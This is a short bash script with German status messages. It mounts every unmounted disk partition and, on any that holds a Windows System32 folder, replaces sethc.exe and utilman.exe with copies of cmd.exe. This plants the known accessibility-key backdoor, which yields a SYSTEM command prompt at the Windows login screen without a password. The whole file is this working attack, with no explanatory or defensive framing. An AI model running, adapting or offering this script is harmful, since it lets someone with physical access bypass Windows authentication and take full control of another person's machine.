#!/bin/bash
BASEDIR="/mnt"

for PARTITION in `fdisk -l | grep -v swap | egrep -o /dev/sd.[0-9]+` ; do
    mount | grep -q "^$PARTITION"
    if [ $? -eq 1 ] ; then
        blkid $PARTITION > /dev/null
        if [ $? -eq 0 ] ; then
            MOUNTPOINT=$BASEDIR/`echo $PARTITION | egrep -o sd.[0-9]+`
            mkdir -p $MOUNTPOINT
            mount $PARTITION $MOUNTPOINT
            if [ $? -eq 0 ] ; then
                echo $PARTITION
                echo "checke $MOUNTPOINT/Windows/System32"
                if [ -d $MOUNTPOINT/Windows/System32 ] ; then
                    echo "Es gibt $MOUNTPOINT/Windows/System32"
                    cd $MOUNTPOINT/Windows/System32
                    mv sethc.exe sethc2.exe
                    mv utilman.exe utilman2.exe
                    mv Utilman.exe Utilman2.exe
                    cp cmd.exe sethc.exe
                    cp cmd.exe utilman.exe
                    cp cmd.exe Utilman.exe
                    cd $BASEDIR
                fi
                umount $PARTITION
                if [ $? -eq 0 ] ; then
                    rm -r $MOUNTPOINT
                fi
            else
            rm -r $MOUNTPOINT
            fi
        fi
    fi
done
exit 0

